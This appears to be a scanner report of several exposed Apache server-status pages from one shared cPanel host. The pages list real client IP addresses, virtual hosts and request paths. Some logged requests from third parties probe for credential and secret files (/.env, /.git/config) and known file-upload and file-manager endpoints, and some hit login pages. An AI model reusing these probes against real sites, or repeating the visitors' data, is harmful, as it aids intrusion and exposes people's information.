      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  8 days 22 hours 34 minutes 53 seconds
      Server load: 0.61 0.49 0.43
      Total accesses: 1012043 - Total Traffic: 285.9 GB - Total Duration: 2614714226
      CPU Usage: u728.3 s116.94 cu4171.57 cs1301.22 - .818% CPU load
      1.31 requests/sec - 388.0 kB/second - 296.2 kB/request - 2583.6 ms/request
      24 requests currently being processed, 0 workers gracefully restarting, 126 idle workers
      ____________KKW__________WK__KW_________________________K_WW____
      K______WW_____K___________________K___W___________K__WK___W_K_KK
      _____________________W..........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-988260/1/5055_
      0.02135424678413080.00.001280.26
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/1/5440_
      0.03111314366123320.00.521060.71
      31.167.168.25http/1.1albayan.edu.sa:443GET /imgweb/files41/%D8%A8%D9%86%D9%83%208.pdf HTTP/1.1
      
      0-988260/1/5567_
      0.03113531381657610.00.001895.43
      37.107.30.63http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/3/5247_
      0.0491480218960.00.011816.48
      195.191.219.130http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1054&t=148.251.8.250&c=5 HTTP
      
      0-988260/1/4872_
      0.05811417153712370.00.001456.67
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/1/4721_
      0.06720405059860.00.001702.31
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1054&t=195.191.219.132&c=5 HT
      
      0-988260/1/4839_
      0.066941123631570.00.021759.60
      144.91.72.238http/1.1garndhabi.org:443GET /wp-login.php HTTP/1.1
      
      0-988260/1/4929_
      0.066012088323170.00.001740.59
      93.158.90.67http/1.1trydaris.com:80GET /robots.txt HTTP/1.1
      
      0-988260/1/4950_
      0.073918104976822960.00.001676.04
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/1/5252_
      0.0727604664108340.00.001260.27
      37.107.30.63http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/1/5337_
      0.0814156199634400.00.001836.75
      37.107.30.63http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/1/5365_
      0.0932866156658290.00.001959.62
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988267/7/4983K
      0.11127969447297.30.291202.19
      151.254.233.225http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-988261/1/4651K
      0.111192539810.80.001491.85
      172.70.115.147http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-988260/0/5179W
      0.000080775620.00.001579.90
      162.158.158.208http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-988260/0/5363_
      0.001513475839710.00.001712.79
      209.38.28.122http/1.1akg.sa:443GET /assets/vendor_admin/plugins/jquery-file-upload/server/php 
      
      0-988260/0/5182_
      0.001511768400230.00.001388.50
      209.38.28.122http/1.1akg.sa:443GET /assets/elfinder/elfinder.html HTTP/1.1
      
      0-988260/0/5154_
      0.001513144615970.00.001828.40
      31.167.72.252http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-988260/0/4912_
      0.00151079466060.00.001628.39
      209.38.28.122http/1.1akg.sa:80GET /coaster/jquery/gallery-upload/server/php/ HTTP/1.1
      
      0-988260/0/4844_
      0.00151271137750.00.001497.68
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-988260/0/5164_
      0.001511967219270.00.001424.18
      209.38.28.122http/1.1akg.sa:443GET /assets/admin/js/tinymce/plugins/filemanager/dialog.php HTT
      
      0-988260/0/4979_
      0.0015175678612090.00.001481.35
      82.167.41.119http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-988260/0/4844_
      0.001514266138512930.00.001279.71
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/0/4826_
      0.00151267664339280.00.001484.19
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-988260/0/5638_
      0.001510166353820.00.001933.05
      66.249.64.8http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1253&l_n=1&page=1 HTTP
      
      1-9209680/696/5434W
      95.789680119611380.0147.311592.69
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      1-9209685/784/5291K
      99.591111639736397.3143.332010.39
      151.254.233.225http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_lhs.png HTTP/
      
      1-9209680/805/5128_
      99.221471116100920.0128.291445.58
      35.243.23.199http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/para
      
      1-9209680/676/4919_
      99.33932801498190.0119.181549.88
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      1-9209681/793/5155K
      99.6001124712000.859.631677.03
      162.158.154.205http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-9209681/836/5461W
      99.5750133887257.796.112015.68
      95.187.96.245http/1.1albayan.edu.sa:443GET /imgweb/1/sincestd1.pdf HTTP/1.1
      
      1-9209680/896/5686_
      99.261331741142665690.0176.381588.36
      37.107.30.63http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      1-9209680/850/5584_
      99.211471934
      Found on 2024-05-08 16:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df712297f9e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 08-May-2024 17:00:44 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  8 days 20 hours 24 minutes
      Server load: 0.38 0.48 0.48
      Total accesses: 997116 - Total Traffic: 281.9 GB - Total Duration: 2473290141
      CPU Usage: u661.19 s97.68 cu4171.57 cs1301.22 - .815% CPU load
      1.3 requests/sec - 386.6 kB/second - 296.4 kB/request - 2480.44 ms/request
      22 requests currently being processed, 0 workers gracefully restarting, 103 idle workers
      .........................W_K_________W_________K_____KW_________
      C_____K____R_WW___W________WW_____________________KWK___W__KWW__
      ____K_________________..........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9-0/0/5054.
      0.00171393278328160.00.001280.26
      209.38.28.122http/1.1akg.sa:443GET /plugins/jquery-file-upload/server/php HTTP/1.1
      
      0-9-0/0/5439.
      0.0017139707966064770.00.001060.19
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5566.
      0.0017139135481551330.00.001895.43
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5244.
      0.0017139180218680.00.001816.48
      31.167.72.252http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-9-0/0/4871.
      0.00171391953428940.00.001456.66
      209.38.28.122http/1.1akg.sa:443GET /assets/vendor/jquery.filer/php/readme.txt HTTP/1.1
      
      0-9-0/0/4720.
      0.00171390405059860.00.001702.31
      209.38.28.122http/1.1akg.sa:80GET /assets/color_admin/plugins/jquery-file-upload/server/php/ 
      
      0-9-0/0/4838.
      0.00171390123630730.00.001759.58
      209.38.28.122http/1.1akg.sa:80GET /filemanager/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/4928.
      0.0017139088320750.00.001740.59
      209.38.28.122http/1.1akg.sa:80GET /.env HTTP/1.1
      
      0-9-0/0/4949.
      0.0017139152976460860.00.001676.04
      31.167.168.136http/1.1albayan.edu.sa:443GET /images/albayan-new.jpg HTTP/1.1
      
      0-9-0/0/5251.
      0.0017139280863987420.00.001260.27
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5336.
      0.0017139099603160.00.001836.75
      209.38.28.122http/1.1akg.sa:80GET /tinymce/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/5364.
      0.00171390156600960.00.001959.62
      31.167.119.169http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-9-0/0/4976.
      0.00171393479693080.00.001201.90
      209.38.28.122http/1.1akg.sa:443GET /assets/jquery-file-upload/server/php HTTP/1.1
      
      0-9-0/0/4650.
      0.00171392392539780.00.001491.85
      209.38.28.122http/1.1akg.sa:443GET /assets/scripts/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/5179.
      0.0017139080775620.00.001579.90
      209.38.28.122http/1.1akg.sa:80GET /lib/jquery-file-upload/server/php/ HTTP/1.1
      
      0-9-0/0/5363.
      0.00171393475839710.00.001712.79
      209.38.28.122http/1.1akg.sa:443GET /assets/vendor_admin/plugins/jquery-file-upload/server/php 
      
      0-9-0/0/5182.
      0.00171391768400230.00.001388.50
      209.38.28.122http/1.1akg.sa:443GET /assets/elfinder/elfinder.html HTTP/1.1
      
      0-9-0/0/5154.
      0.00171393144615970.00.001828.40
      31.167.72.252http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-9-0/0/4912.
      0.0017139079466060.00.001628.39
      209.38.28.122http/1.1akg.sa:80GET /coaster/jquery/gallery-upload/server/php/ HTTP/1.1
      
      0-9-0/0/4844.
      0.0017139271137750.00.001497.68
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9-0/0/5164.
      0.00171391967219270.00.001424.18
      209.38.28.122http/1.1akg.sa:443GET /assets/admin/js/tinymce/plugins/filemanager/dialog.php HTT
      
      0-9-0/0/4979.
      0.001713975678612090.00.001481.35
      82.167.41.119http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-9-0/0/4844.
      0.00171394266138512930.00.001279.71
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/4826.
      0.0017139267664339280.00.001484.19
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5638.
      0.00171390166353820.00.001933.05
      66.249.64.8http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1253&l_n=1&page=1 HTTP
      
      1-9209680/594/5332W
      82.39206098217920.0121.651567.03
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      1-9209680/690/5197_
      82.8148279115248790.0109.411976.46
      52.167.144.230http/1.1albayan.edu.sa:443GET /imgweb/bankrop6.pdf HTTP/1.1
      
      1-9209681/659/4982K
      83.0401111684560.8114.061431.35
      162.158.94.154http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      1-9209680/575/4818_
      82.751253533797932020.0107.841538.55
      51.39.19.111http/1.1albayan.edu.sa:443GET /imgweb/1445/WBs%20on%20Site%2023-24/6th/6th%20Basic%20skil
      
      1-9209680/676/5038_
      83.0318203682247270.049.141666.54
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      1-9209680/746/5371_
      82.864290434130981740.078.691998.26
      51.235.222.221http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      1-9209680/676/5466_
      82.7810670140530730.0105.951517.93
      48.216.233.213http/1.13dvi.com:443GET /.env HTTP/1.1
      
      1-9209680/681/5415_
      82.7511624792
      Found on 2024-05-08 14:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df74d9e118a

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 01-May-2024 06:00:48 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 9 hours 24 minutes 4 seconds
      Server load: 0.44 0.35 0.32
      Total accesses: 149045 - Total Traffic: 50.4 GB - Total Duration: 378445699
      CPU Usage: u338.66 s92.75 cu397.63 cs123.29 - .792% CPU load
      1.24 requests/sec - 439.6 kB/second - 354.6 kB/request - 2539.14 ms/request
      5 requests currently being processed, 0 workers gracefully restarting, 145 idle workers
      _________________________........................._____W________
      ___________________________________K_____________K___________...
      ..............................................._________________
      ___K______________K______________...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-140720/425/1108_
      62.4425646126610.0117.43263.03
      51.39.19.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/5iNzFyqrxpDY5oiO2F4bRt
      
      0-140720/487/1071_
      62.775936943200.083.70228.51
      17.246.19.211http/1.1wahjcm.com:443GET /js/pdfjs-express-viewer/webviewer.min.js HTTP/1.1
      
      0-140720/591/1148_
      62.767218335143710.0203.65785.40
      40.77.167.23http/1.1albayan.edu.sa:443GET /imgweb/file44/%D9%83%D9%8A%D9%81%20%D8%AA%D9%83%D8%AA%D8%A
      
      0-140720/395/1069_
      62.542201037798840.0131.03336.46
      141.179.106.122http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-140720/322/944_
      62.5617318215120.0274.96390.40
      31.167.176.74http/1.1albayan.edu.sa:443GET /apple-touch-icon.png HTTP/1.1
      
      0-140720/471/1153_
      62.77464519336490.0156.64343.05
      114.119.128.233http/1.1daris.live:443GET /product/part/7/26 HTTP/1.1
      
      0-140720/434/1033_
      62.5025821856210280.0312.75426.16
      b37662257c.scan.leakix.orghttp/1.1trydaris.com:443GET /server-status HTTP/1.1
      
      0-140720/390/928_
      62.452576213363230.0118.32232.69
      18.246.3.81http/1.13dvi.com:443GET / HTTP/1.1
      
      0-140720/472/1181_
      62.4226416912668130.0193.10478.08
      94.99.170.242http/1.1albayan.edu.sa:443GET /imgweb/file44/k-rqmih-s4-f3.pdf HTTP/1.1
      
      0-140720/440/1157_
      62.502559512471100.0137.98318.46
      206.189.19.19http/1.1trydaris.com:443GET /.git/config HTTP/1.1
      
      0-140720/650/1342_
      62.4425611811027700.0152.36672.17
      51.39.19.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/y4FPMCYLjAgPjgmMTb55kY
      
      0-140720/337/1057_
      62.5518706589300.0159.38329.59
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-140720/479/1122_
      61.96262117565940.093.99273.54
      206.189.19.19http/1.1
      
      0-140720/381/895_
      62.50255418566220.0206.00364.79
      141.179.106.122http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/CuxddUbFgKz0A7foM9YfwU
      
      0-140720/457/1034_
      62.59128115177850.0104.83356.56
      47.128.123.11http/1.1daris.live:80GET /bin/admin/social%20icon/facebook.png HTTP/1.1
      
      0-140720/426/1032_
      62.59117014760230.080.40320.94
      34.245.35.234http/1.1contact.albayan.edu.sa:80HEAD / HTTP/1.1
      
      0-140720/392/992_
      62.3827414613710010.0170.18392.63
      141.179.106.122http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-140720/454/1107_
      62.382731250581271480.0379.04497.44
      37.243.74.198http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1910/%D8%
      
      0-140720/354/966_
      62.53229116602530.0124.28390.89
      52.167.144.209http/1.1albayan.edu.sa:443GET /imgweb/qbank/3/taw23.pdf HTTP/1.1
      
      0-140720/410/955_
      62.781212871650.0155.56333.05
      108.162.242.100http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-140720/483/1196_
      62.482612019328590.088.35428.95
      141.179.106.122http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-140720/493/1125_
      62.55220699783480.0182.71477.73
      209.141.45.102http/1.1sulaimaniya.edu.sa:443POST /wp-login.php HTTP/1.1
      
      0-140720/387/977_
      62.522423667369580.0172.74308.35
      141.179.106.122http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-140720/381/1006_
      62.0024719549110.0107.71240.09
      141.179.106.122http/1.1
      
      0-140720/400/1042_
      62.40267120402200.0186.85627.01
      141.179.106.122http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/Nx6K4bMltRlmUaK16gqfjJ
      
      1-0-0/0/722.
      0.0054945256260720.00.00256.07
      128.234.111.115http/1.1
      
      1-0-0/0/657.
      0.00549457115672110.00.00256.69
      87.236.176.21http/1.13dvi.com:443GET / HTTP/1.1
      
      1-0-0/0/655.
      0.0054945421969790.00.00212.95
      175.110.230.119http/1.1trydaris.com:443GET /wp-content/themes/betheme-2/muffin-options/svg/menu/dashbo
      
      1-0-0/0/238.
      0.00549451712384420.00.00117.19
      172.71.99.228http/1.1eg.daaris.com:443GET /wp-content/themes/rehub-theme/icons/modulobox.svg HTTP/1.1
      
      1-0-0/0/619.
      0.005494503757590.00.00350.69
      2.90.84.235http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-0-0/0/583.
      0.0054945164912624140.00.00456.07
      31.167.143.155http/1.1
      
      1-0-0/0/601.
      0.005494518571220.00.00292.44
      162.158.190.7http/1.1adyar.com.sa:80GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      1-0-0/0/696.
      0.005494554089280.00.00120.83
      175.110.230.119http/1.1trydaris
      Found on 2024-05-01 03:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df746a9d41e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 01-May-2024 05:52:57 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 9 hours 16 minutes 13 seconds
      Server load: 0.14 0.20 0.28
      Total accesses: 148524 - Total Traffic: 50.1 GB - Total Duration: 378146667
      CPU Usage: u335.69 s91.84 cu397.63 cs123.29 - .792% CPU load
      1.24 requests/sec - 438.9 kB/second - 353.9 kB/request - 2546.03 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 142 idle workers
      _____________K___________........................._____________K
      ______________W___K___________________K______________________...
      ...............................................________K________
      _________K_____________________K_...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-140720/421/1104_
      61.951306125090.0117.12262.72
      54.154.194.213http/1.1proxy-subdomains-vhost.localhosHEAD / HTTP/1.1
      
      0-140720/480/1064_
      61.9025216941340.083.27228.08
      139.59.136.184http/1.1white-petals.com:443GET /_all_dbs HTTP/1.1
      
      0-140720/589/1146_
      61.92176195105010.0161.37743.12
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-140720/393/1067_
      61.85294237796350.0130.95336.38
      17.241.219.235http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=84 HTTP/1.1
      
      0-140720/318/940_
      61.13279278215010.0274.95390.39
      139.59.136.184http/1.1
      
      0-140720/470/1152_
      61.51313177019335580.0156.63343.04
      5.41.113.4http/1.1
      
      0-140720/433/1032_
      61.78423356205910.0312.75426.16
      31.166.195.124http/1.1albayan.edu.sa:443GET /e_sch/jwysiwyg/jquery.wysiwyg.css HTTP/1.1
      
      0-140720/388/926_
      61.7650865513361920.0118.29232.66
      35.0.127.52http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-140720/469/1178_
      61.954717912652680.0186.16471.14
      20.120.94.53http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%AA%D9%88%D9%82%D9%8A%D8%AA%2
      
      0-140720/438/1155_
      61.793771112469120.0137.98318.45
      85.208.96.203http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1183 HTTP/1.1
      
      0-140720/648/1340_
      61.755249211026480.0152.24672.04
      145.239.8.153http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      0-140720/336/1056_
      61.8628026589290.0159.38329.59
      139.59.136.184http/1.1white-petals.com:443GET / HTTP/1.1
      
      0-140720/478/1121_
      61.75510117565910.093.99273.54
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-140721/373/887K
      61.952118560430.8204.03362.82
      172.71.182.34http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-140720/443/1020_
      61.862672115171150.0104.47356.20
      185.191.171.12http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=406 HTTP/1.1
      
      0-140720/422/1028_
      61.8925310214758340.080.35320.88
      46.251.138.134http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      0-140720/391/991_
      61.93115913708540.0170.10392.55
      31.166.21.154http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-140720/453/1106_
      61.90252181021370.0349.28467.69
      139.59.136.184http/1.1white-petals.com:443GET /about HTTP/1.1
      
      0-140720/352/964_
      61.8333025216602490.0124.27390.88
      167.94.146.54http/1.1php.we3dvi.com:80PRI * HTTP/2.0
      
      0-140720/400/945_
      61.90250112870100.0154.95332.45
      139.59.136.184http/1.1white-petals.com:443GET /telescope/requests HTTP/1.1
      
      0-140720/464/1177_
      61.78476199322870.087.59428.19
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-140720/489/1121_
      61.8431429779500.0182.55477.57
      188.54.21.16http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-140720/385/975_
      61.83338267368400.0172.71308.32
      46.251.138.134http/1.1albayan.edu.sa:443GET /images/image1.jpg HTTP/1.1
      
      0-140720/380/1005_
      61.8133909549080.0107.71240.08
      46.251.138.134http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-140720/398/1040_
      61.936848220401090.0186.66626.83
      178.73.67.102http/1.1albayan.edu.sa:443GET /imgweb/vat.jpg HTTP/1.1
      
      1-0-0/0/722.
      0.0054474256260720.00.00256.07
      128.234.111.115http/1.1
      
      1-0-0/0/657.
      0.00544747115672110.00.00256.69
      87.236.176.21http/1.13dvi.com:443GET / HTTP/1.1
      
      1-0-0/0/655.
      0.0054474421969790.00.00212.95
      175.110.230.119http/1.1trydaris.com:443GET /wp-content/themes/betheme-2/muffin-options/svg/menu/dashbo
      
      1-0-0/0/238.
      0.00544741712384420.00.00117.19
      172.71.99.228http/1.1eg.daaris.com:443GET /wp-content/themes/rehub-theme/icons/modulobox.svg HTTP/1.1
      
      1-0-0/0/619.
      0.005447403757590.00.00350.69
      2.90.84.235http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-0-0/0/583.
      0.0054474164912624140.00.00456.07
      31.167.143.155http/1.1
      
      1-0-0/0/601.
      0.005447418571220.00.00292.44
      162.158.190.7http/1.1adyar.com.sa:80GET /wp-includes/wlwmanifest.xml HTTP/1.1
      
      1-0-0/0/696.
      0.005447454089280.00.00120.83
